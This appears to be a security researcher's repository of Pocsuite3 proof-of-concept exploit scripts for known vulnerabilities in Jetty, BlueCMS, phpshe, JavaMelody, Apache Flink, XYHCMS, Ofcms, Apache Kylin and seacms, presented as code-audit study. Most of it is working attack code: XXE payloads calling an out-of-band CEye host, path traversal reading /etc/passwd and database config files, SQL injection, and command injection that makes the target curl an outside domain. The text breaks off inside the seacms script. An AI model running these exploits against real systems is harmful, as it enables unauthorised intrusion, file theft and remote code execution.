├── README.md
├── XSS漏洞-Java
└── jetty_6_x_xss.py
├── XSS漏洞-Php
└── BlueCMS_1_6_xss.py
├── XXE漏洞-Php
└── phpshe_1_7_xxe.py
├── XXE漏洞-Java
└── javamelody_xxe_CVE_2018_15531.py
├── 文件下载漏洞-Java
└── apache_flink_cve_2020_17519_download.py
├── 文件下载漏洞-Php
└── XYHCMS_3_5_download.py
├── SQL注入-Java
└── Ofcms_1_1_2_sql.py
├── 命令注入-Java
└── Apache_Kylin_CVE_2020_13925_rce.py
├── 命令注入-php
└── seacms_6_45_rce.py
├── 文件上传漏洞-Java
└── zantaopms_CNVD_C_2020_121325_upload.py
├── 文件上传漏洞-Php
└── zantaopms_CNVD_C_2020_121325_upload.py
└── SQL注入-Php
└── zzcms_8_3_sql.py
/README.md:
--------------------------------------------------------------------------------
1 | # POC-Test
2 | ### 在学习代码审计过程中,复现了一些漏洞案例,并在其过程中使用Pocsuite3框架编写了对应POC。
3 | ### 声明:POC仅限于测试交流,严禁用于非法用途
4 | ### 命令注入案例
5 | Java:CVE-2020-13925 Apache Kylin命令注入漏洞,http://code2sec.com/cve-2020-13925-apache-kylinming-ling-zhu-ru-lou-dong.html
6 |
7 | Php: seacms 6.45 代码执行漏洞,https://github.com/jiangsir404/PHP-code-audit/blob/master/seacms/seacms%20%E5%A4%9A%E4%B8%AA%E7%89%88%E6%9C%AC%E7%9A%84%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93(search.php).md
8 |
9 | ### SQL注入案例
10 | Java:CVE-2019-9615 OFCMS SQL注入漏洞,https://lanvnal.com/2020/03/15/ofcms-cve-2019-9615-fu-xian/
11 |
12 | Php:CVE-2018-14961 ZZCMS 8.3 前台SQL 注入漏洞,http://keac.club/2020/02/02/CVE-2018-14961/
13 |
14 | ### XXE漏洞案例
15 | Java:CVE-2018-15531,JavaMelody 组件 XXE 漏洞,https://paper.seebug.org/705/
16 |
17 | Php:phpshe v1.7 XXE 漏洞,https://www.sohu.com/a/307805554_354899
18 |
19 | ### XSS漏洞案例
20 | Java:Jetty6.x test页面反射型XSS漏洞,https://www.exploit-db.com/exploits/33564
21 |
22 | Php:BlueCMS V1.6 反射型XSS漏洞,http://wjlshare.com/archives/1473#XSS
23 |
24 | ### 文件上传漏洞案例
25 | Java: Weblogic 任意文件上传漏洞(CVE-2018-2894), https://paper.seebug.org/647/
26 |
27 | Php:禅道 <= 12.4.2 后台文件上传漏洞, https://www.windylh.com/2020/10/28/CNVD-C-2020-121325%EF%BC%9A%E7%A6%85%E9%81%93%E5%90%8E%E5%8F%B0%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0/
28 |
29 | ### 文件下载漏洞案例
30 | Java:Apache Flink 任意文件下载漏洞(CVE-2020-17519),https://www.anquanke.com/post/id/228507#h3-8
31 |
32 | Php:XYHCMS V3.5任意文件下载漏洞,http://itren.xiaolee.net/p/2335042.html
--------------------------------------------------------------------------------
/XSS漏洞-Java/jetty_6_x_xss.py:
--------------------------------------------------------------------------------
1 | # encoding: utf-8
2 | # Author : Sma11stu
3 | # Datetime : 2021/4/4 21:36
4 | # Product : PyCharm
5 | # Project : pocsuite3
6 | # File : jetty_6_x_xss.py
7 | # explain : 文件说明
8 | from pocsuite3.api import Output, POCBase, register_poc, requests, logger, POC_CATEGORY, OptDict, VUL_TYPE
9 | from urllib.parse import urljoin
10 |
11 | class DemoPOC(POCBase):
12 | vulID = 'xxx' # ssvid
13 | version = '3.0'
14 | author = ['seebug']
15 | vulDate = '2021-04-04'
16 | createDate = '2021-04-04'
17 | updateDate = '2021-04-04'
18 | references = ['https://www.sohu.com/a/307805554_354899']
19 | name = 'jetty 6.x 反射型XSS漏洞'
20 | appPowerLink = ''
21 | appName = 'jetty'
22 | appVersion = '<= 6.x'
23 | vulType = VUL_TYPE.XSS
24 | desc = '''
25 | jetty 6.x 反射型XSS漏洞
26 | '''
27 | samples = []
28 | install_requires = ['']
29 | category = POC_CATEGORY.EXPLOITS.REMOTE
30 |
31 | def _verify(self):
32 | result = {}
33 | xss_payload = ""
34 | verify_payload = "/test/" + xss_payload
35 | logger.warn(verify_payload)
36 | veri_url = urljoin(self.url,verify_payload)
37 | logger.warn(veri_url)
38 | headers = {
39 | "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
40 | }
41 | try:
42 | resp = requests.get(veri_url,headers=headers)
43 | if xss_payload in resp.text and resp.status_code == 404:
44 | result['VerifyInfo'] = {}
45 | result['VerifyInfo']['URL'] = veri_url
46 | result['VerifyInfo']['Payload'] = verify_payload
47 | except Exception as e:
48 | logger.warn(str(e))
49 | return self.parse_output(result)
50 |
51 | def _attack(self):
52 | return self._verify()
53 |
54 | def _shell(self):
55 | return self._verify()
56 |
57 | def parse_output(self, result):
58 | output = Output(self)
59 | if result:
60 | output.success(result)
61 | else:
62 | output.fail('target is not vulnerable')
63 | return output
64 |
65 |
66 | register_poc(DemoPOC)
--------------------------------------------------------------------------------
/XSS漏洞-Php/BlueCMS_1_6_xss.py:
--------------------------------------------------------------------------------
1 | # encoding: utf-8
2 | # Author : Sma11stu
3 | # Datetime : 2021/4/4 10:30
4 | # Product : PyCharm
5 | # Project : pocsuite3
6 | # File : EmpireCms_7_5_xss.py
7 | # explain : 文件说明
8 | from pocsuite3.api import Output, POCBase, register_poc, requests, logger, POC_CATEGORY, OptDict, VUL_TYPE
9 | from urllib.parse import urljoin
10 |
11 | class DemoPOC(POCBase):
12 | vulID = 'xxx' # ssvid
13 | version = '3.0'
14 | author = ['seebug']
15 | vulDate = '2021-04-04'
16 | createDate = '2021-04-04'
17 | updateDate = '2021-04-04'
18 | references = ['https://www.sohu.com/a/307805554_354899']
19 | name = 'BlueCMS V1.6 反射型XSS漏洞'
20 | appPowerLink = ''
21 | appName = 'BlueCMS'
22 | appVersion = '<= 1.6'
23 | vulType = VUL_TYPE.XSS
24 | desc = '''
25 | BlueCMS V1.6 反射型XSS漏洞
26 | '''
27 | samples = []
28 | install_requires = ['']
29 | category = POC_CATEGORY.EXPLOITS.REMOTE
30 |
31 | def _verify(self):
32 | result = {}
33 | xss_payload = ""
34 | verify_payload = "ad_js.php?ad_id=" + xss_payload
35 | logger.warn(verify_payload)
36 | veri_url = urljoin(self.url,verify_payload)
37 | logger.warn(veri_url)
38 | headers = {
39 | "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
40 | }
41 | try:
42 | resp = requests.get(veri_url,headers=headers)
43 | if xss_payload in resp.text and resp.status_code == 200:
44 | result['VerifyInfo'] = {}
45 | result['VerifyInfo']['URL'] = veri_url
46 | result['VerifyInfo']['Payload'] = verify_payload
47 | except Exception as e:
48 | logger.warn(str(e))
49 | return self.parse_output(result)
50 |
51 | def _attack(self):
52 | return self._verify()
53 |
54 | def _shell(self):
55 | return self._verify()
56 |
57 | def parse_output(self, result):
58 | output = Output(self)
59 | if result:
60 | output.success(result)
61 | else:
62 | output.fail('target is not vulnerable')
63 | return output
64 |
65 |
66 | register_poc(DemoPOC)
--------------------------------------------------------------------------------
/XXE漏洞-Php/phpshe_1_7_xxe.py:
--------------------------------------------------------------------------------
1 | # encoding: utf-8
2 | # Author : Sma11stu
3 | # Datetime : 2021/3/26 22:10
4 | # Product : PyCharm
5 | # Project : pocsuite3
6 | # File : phpshe_1_7_xxe.py
7 | # explain : 文件说明
8 | from pocsuite3.api import CEye
9 | from pocsuite3.api import Output, POCBase, register_poc, requests, logger, POC_CATEGORY, OptDict, VUL_TYPE
10 | from pocsuite3.lib.utils import random_str
11 | from urllib.parse import urljoin
12 |
13 | class DemoPOC(POCBase):
14 | vulID = 'xxx' # ssvid
15 | version = '3.0'
16 | author = ['seebug']
17 | vulDate = '2021-03-26'
18 | createDate = '2021-03-26'
19 | updateDate = '2021-03-26'
20 | references = ['https://www.sohu.com/a/307805554_354899']
21 | name = 'phpshe xxe漏洞'
22 | appPowerLink = ''
23 | appName = 'phpshe'
24 | appVersion = '< 1.7'
25 | vulType = VUL_TYPE.XML_INJECTION
26 | desc = '''
27 | phpshe xxe漏洞
28 | '''
29 | samples = []
30 | install_requires = ['']
31 | category = POC_CATEGORY.EXPLOITS.REMOTE
32 | token = "xxxxxxxxxxxxx" #ceye认证token
33 |
34 | def _verify(self):
35 | result = {}
36 | CEye_main = CEye(token=self.token)
37 | ceye_subdomain = CEye_main.getsubdomain()
38 | random_uri = random_str(16)
39 | logger.info("random_url为:%s" % random_uri)
40 | verify_payload = """
41 |
43 | %%xxe;
44 | ]>""" % (ceye_subdomain,random_uri)
45 | logger.warn(verify_payload)
46 | veri_url = urljoin(self.url,"/include/plugin/payment/wechat/notify_url.php")
47 | logger.warn(veri_url)
48 | headers = {
49 | "Content-Type": "text/xml",
50 | "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
51 | }
52 | try:
53 | resp = requests.post(veri_url,data=verify_payload,headers=headers)
54 | if CEye_main.verify_request(random_uri):
55 | result['VerifyInfo'] = {}
56 | result['VerifyInfo']['URL'] = veri_url
57 | result['VerifyInfo']['Payload'] = verify_payload
58 | except Exception as e:
59 | logger.warn(str(e))
60 | return self.parse_output(result)
61 |
62 | def _attack(self):
63 | return self._verify()
64 |
65 | def _shell(self):
66 | return self._verify()
67 |
68 | def parse_output(self, result):
69 | output = Output(self)
70 | if result:
71 | output.success(result)
72 | else:
73 | output.fail('target is not vulnerable')
74 | return output
75 |
76 |
77 | register_poc(DemoPOC)
--------------------------------------------------------------------------------
/XXE漏洞-Java/javamelody_xxe_CVE_2018_15531.py:
--------------------------------------------------------------------------------
1 | # encoding: utf-8
2 | # Author : Sma11stu
3 | # Datetime : 2021/3/25 23:02
4 | # Product : PyCharm
5 | # Project : pocsuite3
6 | # File : javamelody_xxe_CVE_2018_15531.py
7 | # explain : 文件说明
8 | from pocsuite3.api import CEye
9 | from pocsuite3.api import Output, POCBase, register_poc, requests, logger, POC_CATEGORY, OptDict, VUL_TYPE
10 | from pocsuite3.lib.utils import random_str
11 |
12 | class DemoPOC(POCBase):
13 | vulID = 'xxx' # ssvid
14 | version = '3.0'
15 | author = ['seebug']
16 | vulDate = '2021-03-25'
17 | createDate = '2021-03-25'
18 | updateDate = '2021-03-25'
19 | references = ['https://paper.seebug.org/705/']
20 | name = 'CVE-2018-15531 javamelody XXE漏洞'
21 | appPowerLink = ''
22 | appName = 'javamelody'
23 | appVersion = '< 1.74.0'
24 | vulType = VUL_TYPE.XML_INJECTION
25 | desc = '''
26 | CVE-2018-15531 javamelody XXE漏洞
27 | '''
28 | samples = []
29 | install_requires = ['']
30 | category = POC_CATEGORY.EXPLOITS.REMOTE
31 | token = "xxxxxxxx" #ceye认证token
32 |
33 | def _verify(self):
34 | result = {}
35 | CEye_main = CEye(token=self.token)
36 | ceye_subdomain = CEye_main.getsubdomain()
37 | random_uri = random_str(16)
38 | logger.info("random_url为:%s" % random_uri)
39 | verify_payload = """
40 |
42 | %%xxe;
43 | ]>""" % (ceye_subdomain,random_uri)
44 | logger.warn(verify_payload)
45 | veri_url = self.url
46 | logger.warn(veri_url)
47 | headers = {
48 | "Content-Type": "text/xml",
49 | "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
50 | "SOAPAction": "aaa"
51 | }
52 | try:
53 | resp = requests.post(veri_url,data=verify_payload,headers=headers)
54 | if CEye_main.verify_request(random_uri):
55 | result['VerifyInfo'] = {}
56 | result['VerifyInfo']['URL'] = veri_url
57 | result['VerifyInfo']['Payload'] = verify_payload
58 | except Exception as e:
59 | logger.warn(str(e))
60 | return self.parse_output(result)
61 |
62 | def _attack(self):
63 | return self._verify()
64 |
65 | def _shell(self):
66 | return self._verify()
67 |
68 | def parse_output(self, result):
69 | output = Output(self)
70 | if result:
71 | output.success(result)
72 | else:
73 | output.fail('target is not vulnerable')
74 | return output
75 |
76 |
77 | register_poc(DemoPOC)
--------------------------------------------------------------------------------
/文件下载漏洞-Java/apache_flink_cve_2020_17519_download.py:
--------------------------------------------------------------------------------
1 | # encoding: utf-8
2 | # Author : Sma11stu
3 | # Datetime : 2021/5/15 17:34
4 | # Product : PyCharm
5 | # Project : pocsuite3
6 | # File : apache_flink_cve_2020_17519_download.py
7 | # explain : 文件说明
8 | import re
9 | import base64
10 | from collections import OrderedDict
11 | from pocsuite3.lib.core.interpreter_option import OptString
12 | from pocsuite3.api import Output, POCBase, register_poc, requests, logger, POC_CATEGORY, OptDict, VUL_TYPE
13 | from urllib.parse import quote
14 |
15 | class DemoPOC(POCBase):
16 | vulID = 'xxx' # ssvid
17 | version = '3.0'
18 | author = ['seebug']
19 | vulDate = '2021-05-15'
20 | createDate = '2021-05-15'
21 | updateDate = '2021-05-15'
22 | references = ['https://paper.seebug.org/705/']
23 | name = 'CVE-2020-17519 Apache Flink 文件下载漏洞'
24 | appPowerLink = ''
25 | appName = 'Apache Flink'
26 | appVersion = '1.11.0、1.11.1、1.11.2'
27 | vulType = VUL_TYPE.ARBITRARY_FILE_DOWNLOAD
28 | desc = '''
29 | CVE-2020-17519 Apache Flink 文件下载漏洞
30 | '''
31 | samples = []
32 | install_requires = ['']
33 | category = POC_CATEGORY.EXPLOITS.REMOTE
34 |
35 | def _options(self):
36 | o = OrderedDict()
37 | o["filename"] = OptString('', description='下载文件名称', require=False)
38 | return o
39 |
40 | def _verify(self):
41 | result = {}
42 | try:
43 | Flag_error = "This file does not exist in JobManager log dir"
44 | verify_payload = '/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fhosts'
45 | verify_url = self.url + verify_payload
46 | logger.info(verify_url)
47 | verify_res = requests.get(verify_url,verify=False)
48 | if verify_res.status_code ==200 and Flag_error not in verify_res.content.decode():
49 | result['VerifyInfo'] = {}
50 | result['VerifyInfo']['URL'] = verify_url
51 | result['VerifyInfo']['Payload'] = verify_payload
52 | result['VerifyInfo']['File_Content'] = '\n'+ verify_res.content.decode()
53 | except Exception as e:
54 | logger.warn(str(e))
55 | return self.parse_output(result)
56 |
57 | def _attack(self):
58 | result = {}
59 | try:
60 | Flag_error = "This file does not exist in JobManager log dir"
61 | if self.get_option("filename"):
62 | attack_filename = quote(quote(self.get_option("filename"),'utf-8'))
63 | else:
64 | attack_filename = quote(quote("/etc/passwd",'utf-8'))
65 | logger.info("下载文件为:" + attack_filename)
66 | attack_payload = '/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..' + attack_filename
67 | attack_url = self.url + attack_payload
68 | logger.info(attack_url)
69 | attack_res = requests.get(attack_url,verify=False)
70 | if attack_res.status_code ==200 and Flag_error not in attack_res.content.decode():
71 | result['VerifyInfo'] = {}
72 | result['VerifyInfo']['URL'] = attack_url
73 | result['VerifyInfo']['Payload'] = attack_payload
74 | result['VerifyInfo']['File_Content'] = '\n' + attack_res.content.decode()
75 | except Exception as e:
76 | logger.warn(str(e))
77 | return self.parse_output(result)
78 |
79 | def _shell(self):
80 | return self._attack()
81 |
82 | def parse_output(self, result):
83 | output = Output(self)
84 | if result:
85 | output.success(result)
86 | else:
87 | output.fail('target is not vulnerable')
88 | return output
89 |
90 | register_poc(DemoPOC)
--------------------------------------------------------------------------------
/文件下载漏洞-Php/XYHCMS_3_5_download.py:
--------------------------------------------------------------------------------
1 | # encoding: utf-8
2 | # Author : Sma11stu
3 | # Datetime : 2021/5/16 11:00
4 | # Product : PyCharm
5 | # Project : pocsuite3
6 | # File : XYHCMS_3_5_download.py
7 | # explain : 文件说明
8 | import re
9 | import base64
10 | from collections import OrderedDict
11 | from pocsuite3.lib.core.interpreter_option import OptString
12 | from pocsuite3.api import Output, POCBase, register_poc, requests, logger, POC_CATEGORY, OptDict, VUL_TYPE
13 | from urllib.parse import quote
14 |
15 | class DemoPOC(POCBase):
16 | vulID = 'xxx' # ssvid
17 | version = '3.0'
18 | author = ['seebug']
19 | vulDate = '2021-05-16'
20 | createDate = '2021-05-16'
21 | updateDate = '2021-05-16'
22 | references = ['https://paper.seebug.org/705/']
23 | name = 'XYHCMS V3.5任意文件下载漏洞'
24 | appPowerLink = ''
25 | appName = 'XYHCMS'
26 | appVersion = '<= 3.5'
27 | vulType = VUL_TYPE.ARBITRARY_FILE_DOWNLOAD
28 | desc = '''
29 | XYHCMS V3.5任意文件下载漏洞
30 | '''
31 | samples = []
32 | install_requires = ['']
33 | category = POC_CATEGORY.EXPLOITS.REMOTE
34 |
35 | def _options(self):
36 | o = OrderedDict()
37 | o["filename"] = OptString('', description='下载文件名称', require=False)
38 | o["PHPSESSID"] = OptString('', description='这个poc需要PHPSESSID', require=True)
39 | return o
40 |
41 | def _verify(self):
42 | result = {}
43 | try:
44 | Flag_error = "该文件不存在"
45 | verify_payload = '/xyhai.php?s=/Database/downFile/file/..\\..\\..\\xyhai.php/type/zip'
46 | verify_url = self.url + verify_payload
47 | logger.info(verify_url)
48 | cookies = {
49 | 'PHPSESSID': self.get_option("PHPSESSID")
50 | }
51 | verify_res = requests.get(verify_url,cookies=cookies,verify=False)
52 | if verify_res.status_code ==200 and Flag_error not in verify_res.content.decode():
53 | result['VerifyInfo'] = {}
54 | result['VerifyInfo']['URL'] = verify_url
55 | result['VerifyInfo']['Payload'] = verify_payload
56 | result['VerifyInfo']['File_Content'] = '\n'+ verify_res.content.decode()
57 | except Exception as e:
58 | logger.warn(str(e))
59 | return self.parse_output(result)
60 |
61 | def _attack(self):
62 | result = {}
63 | try:
64 | Flag_error = "This file does not exist in JobManager log dir"
65 | if self.get_option("filename"):
66 | attack_filename = self.get_option("filename").replace('/','\\\\')
67 | else:
68 | attack_filename = 'App\\Common\\Conf\\db.php'
69 | logger.info("下载文件为:" + attack_filename)
70 | attack_payload = '/xyhai.php?s=/Database/downFile/file/..\\..\\..\\' + attack_filename + '/type/zip'
71 | attack_url = self.url + attack_payload
72 | logger.info(attack_url)
73 | cookies = {
74 | 'PHPSESSID': self.get_option("PHPSESSID")
75 | }
76 | attack_res = requests.get(attack_url,cookies=cookies,verify=False)
77 | if attack_res.status_code ==200 and Flag_error not in attack_res.content.decode():
78 | result['VerifyInfo'] = {}
79 | result['VerifyInfo']['URL'] = attack_url
80 | result['VerifyInfo']['Payload'] = attack_payload
81 | result['VerifyInfo']['File_Content'] = '\n' + attack_res.content.decode()
82 | except Exception as e:
83 | logger.warn(str(e))
84 | return self.parse_output(result)
85 |
86 | def _shell(self):
87 | return self._attack()
88 |
89 | def parse_output(self, result):
90 | output = Output(self)
91 | if result:
92 | output.success(result)
93 | else:
94 | output.fail('target is not vulnerable')
95 | return output
96 |
97 | register_poc(DemoPOC)
--------------------------------------------------------------------------------
/SQL注入-Java/Ofcms_1_1_2_sql.py:
--------------------------------------------------------------------------------
1 | # encoding: utf-8
2 | # Author : Sma11stu
3 | # Datetime : 2021/3/21 10:01
4 | # Product : PyCharm
5 | # Project : pocsuite3
6 | # File : Ofcms_1_1_2_sql.py
7 | # explain : 文件说明
8 |
9 | import re
10 | import json
11 | from collections import OrderedDict
12 | from urllib.parse import urljoin
13 | from requests.cookies import RequestsCookieJar
14 | from pocsuite3.api import Output, POCBase, register_poc, requests, logger, POC_CATEGORY, OptDict, VUL_TYPE
15 | from pocsuite3.lib.utils import random_str
16 | from pocsuite3.lib.core.interpreter_option import OptString
17 |
18 | class DemoPOC(POCBase):
19 | vulID = 'xxx' # ssvid
20 | version = '3.0'
21 | author = ['seebug']
22 | vulDate = '2021-03-21'
23 | createDate = '2021-03-21'
24 | updateDate = '2021-03-21'
25 | references = ['https://lanvnal.com/2020/03/15/ofcms-cve-2019-9615-fu-xian/']
26 | name = 'Ofcms<=1.1.2 Sql注入漏洞-CVE-2019-9615'
27 | appPowerLink = ''
28 | appName = 'Ofcms'
29 | appVersion = '< 1.1.2'
30 | vulType = VUL_TYPE.SQL_INJECTION
31 | desc = '''
32 | Ofcms<=1.1.2 Sql注入漏洞-CVE-2019-9615
33 | '''
34 | samples = []
35 | install_requires = ['']
36 | category = POC_CATEGORY.EXPLOITS.REMOTE
37 |
38 | def _options(self):
39 | o = OrderedDict()
40 | o["username"] = OptString('', description='这个poc需要用户登录,请输入登录账号', require=True)
41 | o["password"] = OptString('', description='这个poc需要用户密码,请输入用户密码', require=True)
42 | return o
43 |
44 | def login(self):
45 | login_url = urljoin(self.url, '/ofcms-admin/admin/dologin.json')
46 | post_data = {
47 | "username": self.get_option("username"),
48 | "password": self.get_option("password")
49 | }
50 | headers = {
51 | "Content-Type": "application/json; charset=UTF-8",
52 | "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
53 | }
54 | try:
55 | resp = requests.post(login_url, data=json.dumps(post_data))
56 | if resp.status_code == 200 and json.loads(resp.text)['code'] == '200':
57 | cookies = requests.utils.dict_from_cookiejar(resp.cookies)
58 | cookie = "JSESSIONID="+cookies["JSESSIONID"]
59 | logger.info("获得的Cookie为:%s" % cookie)
60 | logger.info("Ofcms系统登录成功")
61 | else:
62 | logger.info("Ofcms系统登录失败,报错为 %s " % str(resp.text))
63 | except Exception as e:
64 | logger.warn(e)
65 | logger.warn("Ofcms系统登录失败")
66 | return cookie
67 |
68 | def _verify(self):
69 | result = {}
70 | cookies = self.login()
71 | random_uri = random_str(16)
72 | logger.info("random_uri为:%s" % random_uri)
73 | verify_payload = "update of_cms_link set link_name=updatexml(1,concat(0x7e,('" + random_uri + "'),0x7e),0) where link_id=4"
74 | post_data = {
75 | "sql" : verify_payload
76 | }
77 | veri_url = urljoin(self.url, '/ofcms-admin/admin/system/generate/create.json?sqlid=')
78 | headers = {
79 | "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
80 | "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
81 | "Cookie": cookies
82 | }
83 | logger.info("Headres如下:")
84 | logger.info(headers)
85 | try:
86 | resp = requests.post(veri_url,data=post_data,headers=headers)
87 | flag = "~" + random_uri + "~"
88 | if flag in resp.text:
89 | result['VerifyInfo'] = {}
90 | result['VerifyInfo']['URL'] = veri_url
91 | result['VerifyInfo']['Payload'] = verify_payload
92 | except Exception as e:
93 | logger.warn(str(e))
94 | return self.parse_output(result)
95 |
96 | def _attack(self):
97 | return self._verify()
98 |
99 | def _shell(self):
100 | return self._verify()
101 |
102 | def parse_output(self, result):
103 | output = Output(self)
104 | if result:
105 | output.success(result)
106 | else:
107 | output.fail('target is not vulnerable')
108 | return output
109 |
110 |
111 | register_poc(DemoPOC)
112 |
--------------------------------------------------------------------------------
/命令注入-Java/Apache_Kylin_CVE_2020_13925_rce.py:
--------------------------------------------------------------------------------
1 | # encoding: utf-8
2 | # Author : Sma11stu
3 | # Datetime : 2021/3/13 10:15
4 | # Product : PyCharm
5 | # Project : pocsuite3
6 | # File : Apache_Kylin_CVE_2020_13925.py
7 | # explain : 文件说明
8 | """
9 | If you have issues about development, please read:
10 | https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
11 | for more about information, plz visit http://pocsuite.org
12 | """
13 |
14 | import re
15 | from collections import OrderedDict
16 | from urllib.parse import urljoin
17 | from base64 import b64encode
18 | from pocsuite3.api import CEye
19 | from requests.cookies import RequestsCookieJar
20 | from pocsuite3.api import Output, POCBase, register_poc, requests, logger, POC_CATEGORY, OptDict, VUL_TYPE
21 | from pocsuite3.lib.utils import random_str
22 | from pocsuite3.lib.core.interpreter_option import OptString
23 |
24 | class DemoPOC(POCBase):
25 | vulID = 'xxx' # ssvid
26 | version = '3.0'
27 | author = ['seebug']
28 | vulDate = '2021-03-13'
29 | createDate = '2021-03-13'
30 | updateDate = '2021-03-13'
31 | references = ['http://code2sec.com/cve-2020-13925-apache-kylinming-ling-zhu-ru-lou-dong.html']
32 | name = 'CVE-2020-13925 Apache Kylin命令注入漏洞'
33 | appPowerLink = ''
34 | appName = 'Apache Kylin'
35 | appVersion = '< 3.0.3'
36 | vulType = VUL_TYPE.CODE_EXECUTION
37 | desc = '''
38 | CVE-2020-13925 Apache Kylin命令注入漏洞
39 | '''
40 | samples = []
41 | install_requires = ['']
42 | category = POC_CATEGORY.EXPLOITS.REMOTE
43 | token = "xxxxxxxxxxxxxx" #ceye认证token
44 |
45 | def _options(self):
46 | o = OrderedDict()
47 | o["username"] = OptString('', description='这个poc需要用户登录,请输入登录账号', require=True)
48 | o["password"] = OptString('', description='这个poc需要用户密码,请输入用户密码', require=True)
49 | return o
50 |
51 | def login(self):
52 | login_url = urljoin(self.url, '/kylin/api/user/authentication')
53 | login_data = b64encode((self.get_option("username") + ":" + self.get_option("password")).encode("utf-8"))
54 | headers = {"Authorization": "Basic %s" % login_data.decode('utf-8')}
55 | post_data = {}
56 | try:
57 | resp = requests.post(login_url, data=post_data, headers=headers)
58 | if resp.status_code == 401:
59 | logger.info("账号或密码错误")
60 | if resp.status_code == 200:
61 | cookies = requests.utils.dict_from_cookiejar(resp.cookies)
62 | cookie = "JSESSIONID="+cookies["JSESSIONID"]
63 | logger.info("获得的Cookie为:%s" % cookie)
64 | logger.info("Apache_Kylin登录成功")
65 | else:
66 | logger.info("Apache_Kylin登录失败,响应状态码为 %s " % str(resp.status_code))
67 | except Exception as e:
68 | logger.warn(str(e))
69 | logger.warn("Apache_Kylin登录失败")
70 | return cookie
71 |
72 | def _verify(self):
73 | result = {}
74 | cookies = self.login()
75 | CEye_main = CEye(token=self.token)
76 | ceye_subdomain = CEye_main.getsubdomain()
77 | random_uri = random_str(16)
78 | logger.info("random_url为:%s" % random_uri)
79 | verify_payload = "curl%20" + random_uri + "." + str(ceye_subdomain)
80 | veri_url = urljoin(self.url, '/kylin/api/diag/project/%7c%7c'+verify_payload+'%7c%7c/download')
81 | headers = {
82 | "Content-Type": "text/xml;charset=UTF-8",
83 | "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
84 | "Cookie": cookies
85 | }
86 | logger.info("Headres如下:")
87 | logger.info(headers)
88 | try:
89 | resp = requests.get(veri_url,headers=headers)
90 | if CEye_main.verify_request(random_uri):
91 | result['VerifyInfo'] = {}
92 | result['VerifyInfo']['URL'] = veri_url
93 | result['VerifyInfo']['Payload'] = verify_payload
94 | except Exception as e:
95 | logger.warn(str(e))
96 | return self.parse_output(result)
97 |
98 | def _attack(self):
99 | return self._verify()
100 |
101 | def _shell(self):
102 | return self._verify()
103 |
104 | def parse_output(self, result):
105 | output = Output(self)
106 | if result:
107 | output.success(result)
108 | else:
109 | output.fail('target is not vulnerable')
110 | return output
111 |
112 |
113 | register_poc(DemoPOC)
114 |
--------------------------------------------------------------------------------
/命令注入-php/seacms_6_45_rce.py:
--------------------------------------------------------------------------------
1 | # encoding: utf-8
2 | # Author : Sma11stu
3 | # Datetime : 2021/3/13 10:15
4 | # Product : PyCharm
5 | # Project : pocsuite3
6 | # File : seacms_6_45_rce.py
7 | # explain : 文件说明
8 | """
9 | If you have issues about development, please read:
10 | https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
11 | for more about information, plz visit http://pocsuite.org
12 | """
13 |
14 | import re
15 | import time
16 | from collections import OrderedDict
17 | from urllib.parse import urljoin
18 | from base64 import b64encode
19 | from pocsuite3.api import CEye
20 | from requests.cookies import RequestsCookieJar
21 | from pocsuite3.api import Output, POCBase, register_poc, requests, logger, POC_CATEGORY, OptDict, VUL_TYPE
22 | from pocsuite3.lib.utils import get_middle_text,random_str
23 | from pocsuite3.lib.core.interpreter_option import OptString
24 |
25 | class DemoPOC(POCBase):
26 | vulID = 'xxx' # ssvid
27 | version = '3.0'
28 | author = ['seebug']
29 | vulDate = '2021-03-13'
30 | createDate = '2021-03-13'
31 | updateDate = '2021-03-13'
32 | references = ['https://github.com/jiangsir404/PHP-code-audit/blob/master/seacms/seacms%20%E5%A4%9A%E4%B8%AA%E7%89%88%E6%9C%AC%E7%9A%84%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93(search.php).md']
33 | name = 'seacms 6.45 代码执行漏洞'
34 | appPowerLink = ''
35 | appName = 'seacms'
36 | appVersion = '< 6.45'
37 | vulType = VUL_TYPE.CODE_EXECUTION
38 | desc = '''
39 | seacms 6.45 代码执行漏洞
40 | '''
41 | samples = []
42 | install_requires = ['']
43 | category = POC_CATEGORY.EXPLOITS.REMOTE
44 |
45 | def _options(self):
46 | o = OrderedDict()
47 | o["username"] = OptString('', description='这个poc需要用户登录,请输入登录账号', require=False)
48 | o["command"] = OptString('', description='将要执行的系统命令', require=False)
49 | return o
50 |
51 | def _verify(self):
52 | result = {}
53 | phpcode = "phpinfo()"
54 | flagText = "allow_url_include"
55 | verify_payload = "searchword=1&searchtype=5&order=}{end if}{if:1)" + phpcode + ";if(1}{end if}"
56 | veri_url = urljoin(self.url, '/search.php')
57 | headers = {
58 | "Content-Type": "application/x-www-form-urlencoded;charset=utf-8",
59 | "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
60 | }
61 | try:
62 | resp = requests.post(veri_url,data=verify_payload,headers=headers)
63 | if flagText in resp.text:
64 | result['VerifyInfo'] = {}
65 | result['VerifyInfo']['URL'] = veri_url
66 | result['VerifyInfo']['Payload'] = verify_payload
